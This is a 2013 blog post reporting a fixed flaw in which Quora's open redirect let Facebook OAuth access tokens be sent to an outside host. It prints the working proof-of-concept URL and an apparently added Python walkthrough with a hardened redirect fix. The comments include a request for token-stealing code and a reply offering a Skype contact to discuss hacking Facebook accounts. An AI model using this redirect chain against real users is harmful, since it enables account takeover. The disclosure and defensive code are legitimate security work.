
Hack Facebook accounts via Quora


Indian security researcher Prakhar Prasad has found a way to hack Facebook accounts by exploiting an open-redirect flaw in Quora, one of the best-known question-and-answer websites.

Quora allows users to sign up with their Facebook account. While signing up for Quora, the researcher noticed that quora.com was permitted to receive access tokens from Facebook's OAuth flow.

Prasad managed to steal the access token from the Quora website by exploiting an open-redirect security flaw in quora.com.

POC provided by the researcher:
https://www.facebook.com/dialog/permissions.request?app_id=136609459636&next=https://www.quora.com/contacts/skip?goto=http://poc.prakharprasad.com/quora&response_type=token

“The Facebook OAuth authorization URL requests token permission from the user, but as the user will have the Quora app installed, it will redirect to the value specified in the next parameter of the OAuth authorization URL with a valid access_token,” the researcher said on his blog.

In this case, the next parameter’s value is “https://www.quora.com/contacts/skip?goto=http://poc.prakharprasad.com/quora”. Facebook therefore redirects the user to that URL with the access token attached, and the open-redirect flaw in Quora's goto parameter forwards the user on to Prasad’s page. The page created by Prasad captures the access token and then sends the user back to facebook.com.
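To make the chain concrete, here is an added Python example (not the researcher's or Quora's code) that parses the PoC URL above, shows why a domain check on the next parameter alone passes, and contrasts the unchecked goto redirect with a same-origin-only version. The registered app domain, the placeholder token and the facebook_style_check logic are assumptions.

```python
from urllib.parse import urlparse, parse_qs, urljoin

# Constructed walk-through of the redirect chain described above. Facebook only
# requires `next` to sit on the app's registered domain (assumed here to be
# quora.com); quora.com's own `goto` parameter then forwards the browser elsewhere.
POC_URL = ("https://www.facebook.com/dialog/permissions.request?app_id=136609459636"
           "&next=https://www.quora.com/contacts/skip?goto=http://poc.prakharprasad.com/quora"
           "&response_type=token")
REGISTERED_APP_DOMAIN = "quora.com"  # assumption: the domain Facebook trusts for this app
QUORA_BASE = "https://www.quora.com/"


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def facebook_style_check(next_url, app_domain=REGISTERED_APP_DOMAIN):
    """Coarse check the article implies Facebook performs: is `next` on the app domain?"""
    host = host_of(next_url)
    return host == app_domain or host.endswith("." + app_domain)


def vulnerable_goto(goto):
    """The open redirect: /contacts/skip forwards to whatever `goto` says, unchecked."""
    return goto


def hardened_goto(goto, base=QUORA_BASE):
    """Same-origin-only redirect: resolve `goto` against the site's own base URL and
    reject anything that changes host or scheme ('//evil', 'http://evil', 'javascript:')."""
    target = urljoin(base, goto)
    parsed = urlparse(target)
    if parsed.scheme != "https" or host_of(target) != host_of(base):
        return base  # fall back to a safe landing page instead of redirecting
    return target


def trace_chain(poc_url, goto_handler):
    """Follow the chain and return the host that ends up holding the token fragment."""
    next_url = parse_qs(urlparse(poc_url).query)["next"][0]
    if not facebook_style_check(next_url):
        return None  # Facebook would refuse to redirect here at all
    # With response_type=token the token arrives as a URL fragment, and browsers keep
    # the fragment across a plain 302, so it follows the user to the final landing page.
    fragment = "#access_token=CONSTRUCTED_TOKEN"  # constructed placeholder
    goto = parse_qs(urlparse(next_url).query)["goto"][0]
    landing = goto_handler(goto)
    return host_of(landing), landing + fragment
```

Running trace_chain(POC_URL, vulnerable_goto) lands the token on poc.prakharprasad.com, while the hardened handler keeps it on www.quora.com.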

Unwitting users who follow the PoC link soon find their Facebook account hacked.

Complete technical details can be found in his personal blog.

You can also check out the video demo here:

  1. 21/07/2013 at 5:06 am

    Hmm, is anyone else experiencing problems with the pictures on this blog
    loading? I’m trying to figure out if it's a problem on my end or if it’s the blog.
    Any feedback would be greatly appreciated.

  2. Hassan
    21/07/2013 at 5:19 am

    Dear Zakar,

    There is no problem with the pictures on this blog. Please provide me with pictures from your side for more help.

    regards,

  3. medo
    25/07/2013 at 2:33 pm

    I want the code to get the access token... I made an app, then what else do I do?

    • Hassan
      26/07/2013 at 12:09 pm

      Dear medo, if you want to hack an FB account, this is not the right place to discuss it. Add me, this is my Skype:
      serialb0y

  4. Hassan
    29/07/2013 at 8:35 am

    Note that the bug was fixed.
